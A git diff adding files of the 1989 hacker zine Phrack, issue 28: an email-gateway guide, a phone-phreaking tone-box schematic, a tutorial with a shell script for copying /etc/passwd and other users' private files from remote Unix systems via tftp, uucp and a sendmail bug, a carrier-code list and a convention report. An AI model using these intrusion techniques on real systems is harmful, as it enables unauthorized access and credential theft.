+separate cost.  Members of Wide-Area networks can subscribe to
+DASnet too.  Some of the networks and systems reachable through
+DASnet include the following:
+
+     ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
+     Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI,
+     PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source,
+     Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The
+     WELL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are added
+     all of the time.  As of the writing of this file, Connect, GoverNET,
+     MacNET, and The American Institute of Physics PI-MAIL are soon to be
+     connected.
+
+You can get various accounts on DASnet including:
+
+  o  Corporate Accounts -- If your organization wants more than one individual
+                           subscription.
+  o  Site Subscriptions -- If you want DASnet to link directly to your
+                           organization's electronic mail system.
+
+To send e-mail through DASnet, you send the message to the DASnet
+account on your home system.  You receive e-mail at your mailbox,
+as you do now.  On the Wide-Area Networks, you send mail to
+XB.DAS@STANFORD.BITNET.  On the Subject:  line, you type the
+DASnet address in brackets and then the username just outside of
+them.  The real subject can be expressed after the username
+separated by a "!"  (Example:  Subject:  [0756TK]randy!How's
+Phrack?).
+
+The only disadvantage of using DASnet as opposed to Wide-Area
+networks is the cost.  Subscription costs as of 3/3/89 cost $4.75
+per month or $5.75 per month for hosts that are outside of the
+U.S.A.
+
+You are also charged for each message that you send.  If you are
+corresponding with someone who is not a DASnet subscriber, THEIR
+MAIL TO YOU is billed to your account.
+
+The following is an abbreviated cost list for mailing to the
+different services of DASnet:
+
+     PARTIAL List                DASnet Cost    DASnet Cost
+     of Services                  1st 1000    Each Add'l 1000
+     Linked by DASnet (e-mail)   Characters     Characters:
+
+     INET, MacNET, PeaceNet,                             NOTE:  20 lines
+     Unison, UUCP*, Domains,        .21            .11   of text is app.
+     e.g. .COM, .EDU*                                    1000 characters.
+
+     Dialcom--Any "host" in U.S.    .36            .25
+
+     Dialcom--Hosts outside U.S.    .93            .83
+
+     EasyLink (From EasyLink)       .21            .11
+              (To EasyLink)         .55            .23
+
+     U.S. FAX (internat'l avail.)   .79            .37
+
+     GeoMail--Any "host" in U.S.    .21            .11
+     GeoMail--Hosts outside U.S.    .74            .63
+
+     MCI  (from MCI)                .21            .11
+          (to MCI)                  .78            .25
+          (Paper mail - USA)       2.31            .21
+
+     Telemail                       .36            .25
+
+     W.U. Telex--United States     1.79           1.63
+     (You can also send Telexes outside the U.S.)
+
+     TWICS--Japan                   .89            .47
+
+  *  The charges given here are to the gateway to the network.  The DASnet
+     user is not charged for transmission on the network itself.
+
+Subscribers to DASnet get a free DASnet Network Directory as well
+as a listing in the directory, and the ability to order optional
+DASnet services like auto-porting or DASnet Telex Service which
+gives you your own Telex number and answerback for $8.40 a month
+at this time.
+
+DASnet is a registered trademark of DA Systems, Inc.
+
+                               DA Systems, Inc.  1503 E. Campbell
+                             Ave.
+                              Campbell, CA  95008 408-559-7434
+                             TELEX:  910 380-3530
+
+The following two sections on PeaceNet and AppleLink are in
+association with DASnet as this network is what is used to
+connect them to the Wide-Area Networks.
+
+APPLELINK ~~~~~~~~~ AppleLink is a service of Apple Computer.
+They have their own little network and there are a couple of
+things to know about it.
+
+First of all, there is an AppleLink-Bitnet Mail Relay which was
+created to "enrich the cooperative research relationship of Apple
+Computer and the higher education community by facilitating the
+electronic exchange of information." Any Bitnet user is
+automatically authorized to use the mail relay as well as all
+AppleLink users.
+
+To send to AppleLink from Bitnet, your header should be as
+follows:
+
+To:  XB.DAS@STANFORD.BITNET Subject:  username@APPLELINK!Hi, how
+are things at Apple?
+
+The username is the user's ID that you are sending to and the "!"
+separates the DASnet To:  field from the real subject.
+
+To send to Bitnet from AppleLink, your header should be as
+follows:
+
+To:  DASNET Subject:  C488869@UMCVMB.BITNET!Please add me to the
+Phrack Subscription List.
+
+The C488869@UMCVMB.BITNET (my address) is any Bitnet address and
+as above, the "!" separates the address from the subject of the
+message.
+
+There is one other thing to mention.  Apparently, sending to
+username@APPLELINK.APPLE.COM also will perform the same function.
+If this does not work, try routing to
+username%APPLELINK.APPLE.COM@APPLE.COM.
+
+PEACENET ~~~~~~~~ PeaceNet is a computer-based communication
+system "helping the peace movement throughout the world
+communicate and cooperate more effectively and efficiently,"
+according to their information flier.  It is networked through
+Telenet and can be reached via dial-up.  To subscribe to this
+service, it costs $10 to sign up.  With this sign-up fee, you
+receive a user's manual and a "free" hour of off-peak computer
+time (which is weekday evenings, weekends, and
+holidays).  Beyond this, you pay a monthly $10 fee for another
+hour of off-peak computer usage and you pay $5 for additional
+PEAK hour usage.  They charge, also, for users who require extra
+space on their system.  I guess peace carries a heavy cost in the
+long run!  You do get 2 free hours of off-peak time though for
+every additional user you bring to PeaceNet.  It is a project of
+the Tides Foundation, a San Franciscan public charity, and is
+managed by 3 national peace organizations (non-profit, of
+course!).  Anyway, to join PeaceNet, send your name,
+organizational affiliation, address, city, state, zip code,
+telephone number, and who referred you to PeaceNet as well as
+your credit card number with expiration date (and the name on the
+card if it's different than yours) to PeaceNet, 3228 Sacramento
+Street, San Francisco, CA 94115 or call them at 415-923-0900.
+You can also pay by check but that requires a $50 deposit.
+
+FIDONET
+~~~~~~~
+FIDONET is, of course, the ever-popular group of IBM bulletin
+boards that made it possible for networking to be incorporated
+into bulletin board systems.  FIDONET seems to have a number of
+gateways in the Wide-Area Networks.  First of all, it has its own
+domain -- .ifna.org -- which makes it possible to mail right to
+FIDONET without routing through UUCP gateways or whatever.  The
+format for this gateway is:
+
+Username@f<node #>.n<net #>.z<zone #>.ifna.org
+
+In other words, if I wanted to mail to Silicon Swindler at
+1:135/5, the address would be
+Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your
+mailer knows the .ifna.org domain, it should get through alright.
+Apparently, as of the writing of this article, they have
+implemented a new gateway name called fidonet.org which should
+work in place of ifna.org in all routings.  If your mailer does
+not know either of these domains, use the above routing but
+replace the first "@" with a "%" and then afterwards, use either
+of the following mailers after the "@":  CS.ORST.EDU or
+K9.CS.ORST.EDU (i.e. username%f<node #>.n<net #>.z<zone
+#>.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with
+K9.CS.ORST.EDU]).
+
+The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was
+posted on INFONETS DIGEST which lists a number of FIDONET gateways:
+
+Net      Node    Node Name
+~~~      ~~~~    ~~~~~~~~~
+104      56      milehi.ifna.org
+105      55      casper.ifna.org
+107      320     rubbs.ifna.org
+109      661     blkcat.ifna.org
+125      406     fidogate.ifna.org
+128      19      hipshk.ifna.org
+129      65      insight.ifna.org
+143      N/A     fidogate.ifna.org
+152      200     castle.ifna.org
+161      N/A     fidogate.ifna.org
+369      17      megasys.ifna.org
+
+NOTE:  The UUCP equivalent node name is the first part of the node name.  In
+       other words, the UUCP node milehi is listed as milehi.ifna.org but can
+       be mailed directly over the UUCP network.
+
+Another way to mail to FIDONET, specifically for Internet people, is in this
+format:
+
+ihnp4!necntc!ncoast!ohiont!<net #>!<node #>!user_name@husc6.harvard.edu
+
+And for those UUCP mailing people out there, just use the path described and
+ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on
+most any FIDONET bulletin board, but it is quite large.
+
+ONTYME
+~~~~~~
+Previously known as Tymnet, OnTyme is the McDonnell Douglas revision.  After
+they bought out Tymnet, they renamed the company and opened an experimental
+Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for
+certain corporate addresses within McDonnell Douglas and Tymnet, not their
+customers.  The userid format is xx.yyy or xx.y/yy where xx is a net name and
+yyy (or y/yy) is a true username.  If you cannot directly nail this, try:
+
+xx.yyy%ONTYME.TYMNET.COM@TYMIX.TYMNET.COM
+
+A subnet of Tymnet is called GeoNet.  It is a private X.25-based
+subnet that is operated by the U.S. Geological Survey, a bureau
+of the U.S. Department of the Interior.  It supports about 165
+host computers including about 75 USGS Primes, 50 VAXen, and 2
+Amdahls.  One of their VAX systems is on BITnet at USGSRESV and
+they have SPAN nodes at IFLAG1.SPAN and EROSA.SPAN.
+
+THENET
+~~~~~~
+The Texas Higher Education Network (THEnet) is comprised of many
+of the institutions of higher education in the state of Texas.
+Its backbone network protocol is DECnet.  THEnet has recently
+been designated as an NSF regional network, distributing Internet
+Protocol (IP) access over DECnet in some cases and utilizing
+multi-protocol routers in others.  THEnet has a NIC (Network
+Information Center) at THENIC.THE.NET and addresses within THEnet
+are probably routed to user@destination.THE.NET.
+
+UUCP PATHS AND NODE INFORMATION
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Many UUCP Unix nodes have the commands uuhosts and uupath.  The
+uuhosts command allows you to receive information about a
+specified UUCP node such as the path, node contact, how it is
+polled for USENET feeds, etc.  The uupath command simply tells
+you the path from one UUCP node to another.  Well, although at
+this time, this is only good for Bitnet users, this interactive
+message feature is good to know just in case you need to know a
+path to a particular node.  For IBM systems using RSCS network
+software, use the command
+
+SM RSCS CMD PSUVAX1 UUPATH node1 node2 ...
+
+     (For people on VAXen with JNET network software, the format is:     )
+     (SEND/COMMAND PSUVAX1 UUPATH node1                                  )
+
+to receive standard information listed above from the uupath command.
+
+Multiple nodes can be listed where node1 node2 represent separate UUCP nodes.
+
+I've found that this can be useful in finding surrounding nodes
+of the destination node in case you have a problem mailing
+through a particular path or node.  You can, with this command,
+use alternate routings by specifying them with a "bang-path" that
+will indicate to the UUCP gateway where the message is to be sent
+to next.  This is in the format of, say,
+"psuvax1!catch22!msp!taran@UUCPGATE" or whatever where UUCPGATE
+can be any UUCP gateway such as PSUVAX1 or UUNET.UU.NET to name a
+few.
+
+NICS
+~~~~
+The Network Information Centers (NICs) can be extremely useful in
+figuring out various problems on the networks, such as routings
+or the place at which the node resides, etc.
+
+BITNIC is the BITnet Network Information Center which is located
+in New Jersey.  Its node name is BITNIC.BITNET and it contains a
+variety of resources which can be utilized via mail or via direct
+messages from Bitnet users.
+
+The DATABASE@BITNIC contains lists of all kinds.  This database
+does not limit itself to information about the networks.  It does
+contain this information, but also holds various trivialities.
+Send the HELP command either via direct message to
+DATABASE@BITNIC if on Bitnet or send mail to that address
+containing the command you wish to perform (i.e. send a message
+saying HELP to DATABASE@BITNIC.BITNET from another network or
+from Bitnet if you're at a node without direct message
+capabilities).
+
+LISTSERV@BITNIC contains the standard listserver files that you'd
+expect to find plus some other interesting ones.  I'm not going
+to take the time to tutor you, the reader, in using these, so
+just send a HELP command the same as you would to DATABASE@BITNIC
+for more information.
+
+NETSERV@BITNIC is a file server which contains information files
+pertaining to various networks that are connected to Bitnet, as
+well as files about Bitnet.  From here, you can get network node
+lists, information files on networks such as SPAN, ARPANET,
+NETNORTH, etc. and other network related files.  This can be an
+extremely useful resource when you're trying to mail someone at
+another network.
+
+The Data Defense Network NIC (DDN NIC) is located at SRI-NIC.ARPA
+and has various useful files about the DDN as well as the
+Internet.
+
+There are a number of ways to obtain information from the DDN
+NIC.  First of all, people on the Internet with the Telnet
+capability can Telnet to SRI-NIC.ARPA and perform a number of
+procedures from the pre-login screen.  First of all, you can get
+TAC News updates by typing TACNEWS.  The NIC command allows you
+to find various facts about the whereabouts of network
+information files, etc.  The WHOIS command is probably the most
+useful of these 3.  The WHOIS program allows you to find
+addresses for registered users of the networks as well as
+information about networks and nodes on the networks, depending
+on what you ask the WHOIS program for.  To find only a certain
+record type, you can use the following specifiers:
+
+Arpanet        DOmain         GAteway        GRoup          HOst           IMp
+Milnet         NEtwork        Organization   PSn            TAc
+
+To search for a specific field, use the following specifiers:
+
+HAndle or "!"    Mailbox or if it contains "@"        NAme or a "." leading
+
+These features return whatever information is available from the DDN NIC
+database.  If you do not have the capability to use Telnet, mail can be sent to
+SERVICE@SRI-NIC.ARPA with the "SUBJECT:" line containing the following
+commands:
+
+HELP          This will send you a help file for using the DDN NIC.
+RFC nnn       This sends you a Request For Comments file (where nnn is either
+              the number of the RFC file or else is INDEX to list them).
+IEN nnn       This sends you an Internet Engineering Notes file where nnn is
+              the same as above.
+NETINFO xxx   This feature allows you to get files about the networks where
+              xxx is the filename or else the word INDEX for a list of
+              available files.
+HOST xxx      This returns information pertaining to the xxx host specified.
+WHOIS xxx     This is the same as using the WHOIS command from Telnet.  For
+              details on how to use this, send the WHOIS HELP command on the
+              "Subject:" line.
+
+There are other Network Information Centers throughout the networks but as far
+as I know, their abilities are nothing near as powerful as SRI-NIC.ARPA.  They
+are the places, though, to mail to for answers concerning those networks if
+you have some question as to the workings of the network or anything else.
+_______________________________________________________________________________
diff --git a/phrack28/5.txt b/phrack28/5.txt
new file mode 100644
index 0000000..0608127
--- /dev/null
+++ b/phrack28/5.txt
@@ -0,0 +1,108 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #5 of 12
+
+                  /////////////////////\\\\\\\\\\\\\\\\\\\\\
+                 ||                                        ||
+                 || A Real Functioning PEARL BOX Schematic ||
+                 ||                                        ||
+                 ||        Written, Tested, and Used       ||
+                 ||                                        ||
+                 ||               by Dispater              ||
+                 ||                                        ||
+                 ||              July 1, 1989              ||
+                 ||                                        ||
+                  \\\\\\\\\\\\\\\\\\\\\/////////////////////
+
+
+Introduction:  After reading the earlier renditions of schematics
+               for the Pearl Box, I decided that there was an
+               easier and cheaper way of doing the same thing
+               with an IC and parts you probably have just laying
+               around the house.
+
+
+What Is A Pearl Box and Why Do I Want One?
+
+     A Pearl Box is a tone generating device that is used to make
+     a wide range of single tones.  Therefore, it would be very
+     easy to modify this basic design to make a Blue Box by
+     making 2 Pearl Boxes and joining them together in some
+     fashion.
+
+     A Pearl Box can be used to create any tone you wish that
+     other boxes may not.  It also has a tone sweep option that
+     can be used for numerous things like detecting different
+     types of phone tapping devices.
+
+
+Parts List:
+
+        CD4049 RCA integrated circuit
+        .1 uF disk capacitor
+        1 uF 16V electrolitic capacitor
+        1K resistor
+        10M resistor
+        1meg pot
+        1N914 diode
+        Some SPST momentary push-button switches
+        1 SPDT toggle switch
+        9 Volt battery & clip
+        and miscellaneous stuff you should have laying around the house.
+
+
+State-of-the-Art-Text Schematic:
+                                       +  16V  1uF -
+              _______________________________||_____
+             |        !     !                ||     |           _
+             |   _______________________            |__________| |/| 8ohms
+         ____|__|_____:__|__:__|_       |            __________| | |
+        | 9 10 11 12 13 14 15 16 |      |           |          |_|\|
+        |        CD4049UBE       |      |           |
+        |_1__2__3__4__5__6__7__8_|      :           |          _
+          |  |  |__|  |__|  |  |____________________|_________[-]
+          |  |  !           !           :                     [b]
+          |  |__________________________|                     [a]
+          |     :           :           |                     [t]
+          |     !    1N914  !           !                     [t]
+          |___________|/|_____________________________________[+]
+                :     |\|   :           :
+                |           |           |
+                |    10M    |           |
+                |___/\/\/\__|           |
+                |           |           |
+                |_____||____|           |  <-- These 2 wires to the center pole
+                      ||    |           |      of switch.
+                 .1uF   50V |           |
+                            |           |
+     _______________________|           |_____________________________
+    |                   ___[Toggle Switch]____________                |
+    |                  |                              |          ___  |
+    |                  |                              |          o o  |
+    |                  |                              | /\/\/\___| |__|
+    |_/\/\/\____/\/\/\ |                              |    ^          |
+        1K         ^   |                              |____|     ___  |
+                   |___|                              |          o o  |
+                                                      | /\/\/\___| |__|
+          (pot side)                    (push-button  |  ^
+                                            side)     |__|
+
+Explanation:
+
+     The 2 wires that lead from the main part of the circuit
+     should be connected to the center poles on the toggle
+     switch.  Put the 2 wires to the pot on one side and the 2
+     wires going to the push-buttons to the other side.  That way
+     you can switch between tone sweep and the favorite tones you
+     like (the push-button side).
+
+     To keep tones that you want to use frequently like 1850 Hz
+     then all you have to do is put in a variable resistor and
+     adjust it to where you have the correct tone, then just put
+     a push-button switch on the line.  You can link them
+     together in a chain, etc.  There are many other good
+     modifications to make to the box so have fun and be smart.
+
+--Dispater
+
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\?///////////////////////////////////////
diff --git a/phrack28/6.txt b/phrack28/6.txt
new file mode 100644
index 0000000..de6ae34
--- /dev/null
+++ b/phrack28/6.txt
@@ -0,0 +1,152 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #6 of 12
+
+                     +++++++++++++++++++++++++++++++++++++
+                     +                                   +
+                     +       Snarfing Remote Files       +
+                     +                                   +
+                     +                by                 +
+                     +                                   +
+                     +           Dark OverLord           +
+                     +                                   +
+                     +++++++++++++++++++++++++++++++++++++
+
+There are many ways of getting copies of files from a remote
+system that you do not have permission to read or an account on
+login on to and access them through.  Many administrators do not
+even bother to restrict many access points that you can use.
+
+Here are the simplest ways:
+
+
+A)  Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy
+    of a file if you are running on an Internet based network.
+
+B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy
+   of a file if uucp connections are running on that system.
+
+C) Access one of many known security loopholes.
+
+
+In the following examples, we will use the passwd file as the
+file to acquire since it is a readable file that can be found on
+most systems that these attacks are valid on.
+
+Method A :
+
+1) First start the tftp program:  Enter the command:
+
+ tftp
+
+    [You have the following prompt:]
+
+ tftp>
+
+
+2) The next step is to connect to the system that you wish to
+    retrieve files from.  At the tftp, type:
+
+ tftp> connect other.system.com
+
+
+3) Now request the file you wish to get a copy of (in our case, the
+    passwd file /etc/passwd ):
+
+ tftp> get /etc/passwd /tmp/passwd
+
+    [You should see something that looks like the following:]
+
+ Received 185659 bytes in 22 seconds.
+
+4) Now exit the tftp program with the "quit" command:
+
+ tftp> quit
+
+You should now have a copy of other.system.com's passwd file in
+your directory.
+
+NOTE:  Some Unix systems' tftp programs have a different syntax.
+       The above was tested under SunOS 4.0
+
+For example, on Apollos, the syntax is:
+
+    tftp -{g|g!|p|r|w} <local file> <host> <foreign file>
+[netascii|image]
+
+Thus you must use the command:
+
+ tftp -g password_file networked-host /etc/passwd
+
+Consult your local "man" pages for more info (or in other words
+RTFM).
+
+At the end of this article, I will include a shell script that
+will snarf a password file from a remote host.  To use it type:
+
+ gpw system_name
+
+Method B :
+
+Assuming we are getting the file  /etc/passwd  from the system
+uusucker, and our system has a direct uucp connection to that
+system, it is possible to request a copy of the file through the
+uucp links.  The following command will request that a copy of
+the passwd file be copied into uucp's home directory
+/usr/spool/uucppublic :
+
+ uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
+
+The flag "-m" means you will be notified by mail when the transfer is
+completed.
+
+Method C:
+
+    The third possible way to access the desired file requires
+that you have the login permission to the system.
+
+In this case we will utilize a well-known bug in Unix's sendmail
+daemon.
+
+The sendmail program has and option "-C" in which you can specify
+the configuration file to use (by default this file is
+/usr/lib/sendmail.cf or /etc/sendmail.cf).  It should also be
+noted that the diagnostics outputted by sendmail contain the
+offending lines of text.  Also note that the sendmail program
+runs setuid root.
+
+The way you can abuse this set of facts (if you have not yet
+guessed) is by specifying the file you wish read as the
+configuration file.  Thus the command:
+
+ sendmail -C/usr/accounts/random_joe/private/file
+
+Will give you a copy of random joe's private file.
+
+Another similar trick is to symlink your .mailcf file to joe's
+file and mail someone.  When mail executes sendmail (to send the
+mail), it will load in your .mailcf and barf out joe's stuff.
+
+First, link joe's file to your .mailcf .
+
+ ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
+
+Next, send mail to someone.
+
+ mail C488869@umcvmb.missouri.edu
+
+And have fun.
+
+-=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
+:
+: gpw copyright(c) Dark Overlord
+:
+/usr/ucb/tftp $1 << EOF
+mode ascii
+verbose
+trace
+get /etc/passwd /tmp/pw.$1
+quit
+EOF
+-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
+___________________________________________________________
diff --git a/phrack28/7.txt b/phrack28/7.txt
new file mode 100644
index 0000000..8597726
--- /dev/null
+++ b/phrack28/7.txt
@@ -0,0 +1,243 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #7 of 12
+                     ____________________________________
+                     \                                  /
+                      \  Other Common Carriers (OCCs)  /
+                       \                              /
+                        \    A List By Equal Axis    /
+                         \                          /
+                          \   September 19, 1989   /
+                           \______________________/
+
+Hi everyone.  One hundred percent accuracy is not guaranteed.
+Many small long distance companies operate for a few months or a
+year and then then merge with others or go out of business, etc.
+Also, not all of the places listed below work in every location.
+The only ones you can assume work almost everywhere are MCI,
+Sprint, AT&T, Western Union, and Telecom USA.  Most of the others
+are strictly local, appearing in just a few states or cities.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+001     MidAmerican LD (Republic Telecom)
+002     AmeriCall LDC
+003     RCI Corporation
+007     Tel America
+011     Metromedia Long Distance
+012     Charter Corporation (Tri-J)
+013     Access Services
+021     Mercury
+022     MCI Telecommunications
+023     Texnet
+024     Petricca Communications Systems
+028     Texnet
+030     Valu-Line of Wichita Falls
+031     Teltec Saving Communications
+033     US Sprint
+036     Long Distance Savers
+039     Electronic Office Centers of America (EO/Tech)
+042     First Phone
+044     Allnet Communication Services (LDX, Lexitel)
+053     American Network (Starnet)
+056     American Satellite
+057     Long Distance Satellite
+059     COMNET
+060     Valu-Line of West Texas
+063     COMNET
+069     V/COM
+070     National Telephone Exchange
+080     AMTEL Systems
+084     Long Distance Service (LDS)
+085     WesTel
+088     Satellite Business Systems (MCI)
+089     Telephone Systems
+090     WesTel
+093     Rainbow Communications
+095     Southwest Communications
+099     AmeriCall
+122     RCA Global Communications
+137     All America Cables and Radio (ITT)
+142     First Phone
+146     ARGO Communications
+188     Satellite Business Systems
+201     PhoneNet
+202     ExecuLines
+203     Cypress Telecommunications (Cytel)
+204     United Telephone Long Distance
+206     United Telephone Long Distance
+211     RCI
+212     Call US
+213     Long Distance Telephone Savers
+214     Tyler Telecom
+215     Star Tel of Abilene
+217     Call US
+219     Call USA
+220     Western Union Telegraph
+222     MCI Telecommunications (SBS)
+223     Cable & Wireless Communication (TDX)
+224     American Communications
+227     ATH Communications (Call America)
+229     Bay Communications
+232     Superior Telecom
+233     Delta Communications
+234     AC Teleconnect (Alternative Communication)
+237     Inter-Comm Telephone
+239     Woof Communications (ACT)
+241     American Long Lines
+242     Choice Information Systems
+244     Automated Communications
+245     Taconic Long Distance Service
+250     Dial-Net
+252     Long Distance/USA
+253     Litel Telecommunications
+255     All-State Communications
+256     American Sharecom
+260     Advanced Communications Systems
+263     Com Systems (Sun Dial Communications)
+268     Compute-A-Call
+276     CP National (American Network, Starnet)
+284     American Telenet
+286     Clark Telecommunications
+287     ATS Communications
+288     AT&T Communications
+298     Thriftline
+302     Austin Bestline
+303     MidAmerican LD (Republic Telecom)
+311     SaveNet (American Network, Starnet)
+318     Long Distance Savers
+321     Southland Systems
+322     American Sharecom
+324     First Communication
+331     Texustel
+333     US Sprint
+336     Florida Digital Network
+338     Midco Communications
+339     Communication Cable Laying
+343     Communication Cable Laying
+345     AC Teleconnect (Alternative Communication)
+350     Dial-Net
+355     US Link
+357     Manitowoc Long Distance Service
+362     Electronic Office Centers of America (EO/Tech)
+363     Tel-Toll (Econ-O-Dial of Bishop)
+369     American Satellite
+373     Econo-Line Waco
+375     Wertern Union Telegraph
+385     The Switchboard
+393     Execulines of Florida
+400     American Sharecom
+404     MidAmerican LD (Republic Telecom)
+412     Penn Telecom
+428     Inter-Comm Telephone
+432     Lightcall
+435     Call-USA
+436     Indiana Switch
+440     Tex-Net
+441     Escondido Telephone
+442     First Phone
+444     Allnet Communication Services (LDX, Lexitel)
+455     Telecom Long Distance
+456     ARGO Communications
+462     American Network Services
+464     Houston Network
+465     Intelco
+466     International Office Networks
+469     GMW
+472     Hal-Rad Communications
+480     Chico Telecom (Call America)
+488     United States Transmission Systems (ITT)
+505     San Marcos Long Distance
+515     Burlington Telephone
+529     Southern Oregon Long Distance
+532     Long Distance America
+533     Long Distance Discount
+536     Long Distance Management
+550     Valu-Line of Alexandria
+551     Pittsburg Communication Systems
+552     First Phone
+555     TeleSphere Networks
+566     Cable & Wireless Communication (TDX)
+567     Advanced Marketing Services (Dial Anywhere)
+579     Lintel System (Lincoln Telephone LD)
+590     Wisconsin Telecommunications Tech
+599     Texas Long Distance Conroe
+601     Discount Communications Services
+606     Biz Tel Long Distance Telephone
+622     Metro America Communications
+634     Econo-Line Midland
+646     Contact America
+654     Cincinnati Bell Long Distance
+655     Ken-Tel Service
+660     Tex-Net
+666     Southwest Communications
+675     Network Services
+680     Midwest Telephone Service
+682     Ashland Call America
+684     Nacogdoches Telecommunications
+687     NTS Communications
+700     Tel-America
+704     Inter-Exchange Communications
+707     Telvue
+709     Tel-America
+717     Pass Word
+726     Procom
+727     Conroe-Comtel
+735     Marinette-Menominee Lds
+737     National Telecommunications
+741     ClayDesta
+742     Phone America of Carolina
+743     Peninsula Long Distance Service
+747     Standard Informations Services
+755     Sears Communication
+757     Pace Long Distance Service
+759     Telenet Communication (US Sprint)
+760     American Satellite
+766     Yavapai Telephone Exchange
+771     Telesystems
+777     US Sprint
+785     Olympia Telecom
+786     Shared Use Network Service
+787     Star Tel of Abilene
+788     ASCI's Telepone Express Network
+789     Microtel
+792     Southwest Communications
+800     Satelco
+801     MidAmerican LD (Republic)
+827     TCS Network Services
+833     Business Telecom
+839     Cable & Wireless Communication (TDX)
+847     VIP Connections
+850     TK Communications
+852     Telecommunicatons Systems
+859     Valu-Line of Longview
+866     Alascom
+872     Telecommunications Services
+874     Tri-Tel Communications
+879     Thriftycall (Lintel Systems)
+881     Coastal Telephone
+882     Tuck Data Communications
+883     TTI Midland-Odessa
+884     TTI Midland-Odessa
+885     The CommuniGroup
+888     Satellite Business Systems (MCI)
+895     Texas on Line
+897     Leslie Hammond (Phone America)
+898     Satellite Business Systems (MCI)
+910     Montgomery Telamarketing Communication
+915     Tele Tech
+933     North American Communications
+936     Rainbow Commuinications
+937     Access Long Distance
+938     Access Long Distance
+951     Transamerica Telecommunications
+955     United Communications
+960     Access Plus
+963     Tenex Communications
+969     Dial-Net
+985     America Calling
+986     MCI Telecommunications (SBS)
+987     ClayDesta Communications
+988     Western Union Telegraph
+991     Access Long Distance
+____________________________________________________________
diff --git a/phrack28/8.txt b/phrack28/8.txt
new file mode 100644
index 0000000..16fa8a6
--- /dev/null
+++ b/phrack28/8.txt
@@ -0,0 +1,588 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #8 of 12
+
+           PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
+           ^*^                                                   ^*^
+           PWN         P h r a c k   W o r l d   N e w s         PWN
+           ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
+           PWN            Special Edition Issue Three            PWN
+           ^*^                                                   ^*^
+           PWN       "Meet The Hackers Behind The Handles"       PWN
+           ^*^                 June 23-25, 1989                  ^*^
+           PWN                                                   PWN
+           ^*^          Created, Written, and Edited             ^*^
+           PWN               by Knight Lightning                 PWN
+           ^*^                                                   ^*^
+           PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
+
+
+SummerCon... What is it?  In many ways, SummerCon is much more
+than just a convention that attracts America's greatest phreaking
+and hacking personalities.  SummerCon is a state of mind.
+
+Hackers by nature are urged on by a hidden sense of adventure to
+explore the unknown, to challenge the unchallenged, to reach out
+and experiment with anything and everything.  The realization
+that we are not alone in our quest sometimes comes as a great
+gift and the opportunity to meet one's heroes, partners, and
+idols can be the most awe-inspiring aspect of the hacker
+community -- this is what SummerCon is all about.
+
+On the surface, SummerCon looks like a handful of youths hanging
+out at a hotel in St. Louis, Missouri.  To me, it is more like
+one of those madcap movies you see on late night Home Box Office
+or something.  No real point or direction, rebels without cause,
+all in the name of frantic fun and games.  The atmosphere
+surrounding SummerCon is that of a dream world where once a year
+you can escape to a fantasy where ingenuity is king and you have
+friends around you at every moment.  SummerCon itself may only
+last a weekend, but the friendships last a lifetime.
+
+Welcome to SummerCon '89!  This special edition of Phrack World
+News contains the exclusive coverage of the events and activities
+of a handful of the nation's greatest hackers on June 23-25,
+1989.
+
+
+PreCon '89:  Knight Lightning and Taran King Make Plans
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We
+remembered the fun at SummerCon '87 and how SummerCon '88 had
+lacked something.  In a sense, the first SummerCon was very
+private because almost all of the attendants were members on
+Metal Shop Private, the bulletin board that was once the center
+of the "elite" modem community.  The second SummerCon was a
+little different.  Both Taran and I had been out of action for
+nearly a year and we had not intended to hold another convention
+ever again until June 1988 when we both decided that one good
+convention deserves another.  SummerCon '88 was thrown together
+and a few changes were made.  It was good, but this year we
+decided to set our sights higher than ever.
+
+
+PreCon '89:  The Early Birds                    Thursday Evening,
+June 22, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The first guests to
+this year's convention arrived a day ahead of schedule.  Control
+C, a veteran of the previous two conventions, and Erik Bloodaxe
+flew in to St. Louis on Thursday evening, June 22, 1989.  They
+were greeted by Forest Ranger and then after some rowdy
+activities at the airport, the threesome adjourned to the Best
+Western Executive International hotel -- The very same hotel
+where the first SummerCon was held in June 1987.
+
+Around 10 PM, Taran King and I met up and being unable to locate
+Control C, Erik Bloodaxe, and Forest Ranger, we decided to take a
+trip to the hotel on the chance that they would be there by the
+time we showed up.  As we approached the hotel, I felt a strange
+sensation like deja-vu.  It had been two years since I had been
+to the Executive International, or even anywhere near that part
+of town (with the exception of the airport).  At any rate, luck
+was on our side.  We raced through the newly remodeled hotel
+lobby and out past the pool.  Control C's and Erik Bloodaxe's
+room stuck out like a beacon.  Their room became known as the
+"Doom Room" in recognition of the many members of the Legion of
+Doom/Hackers that stayed there throughout the course of the
+weekend.
+
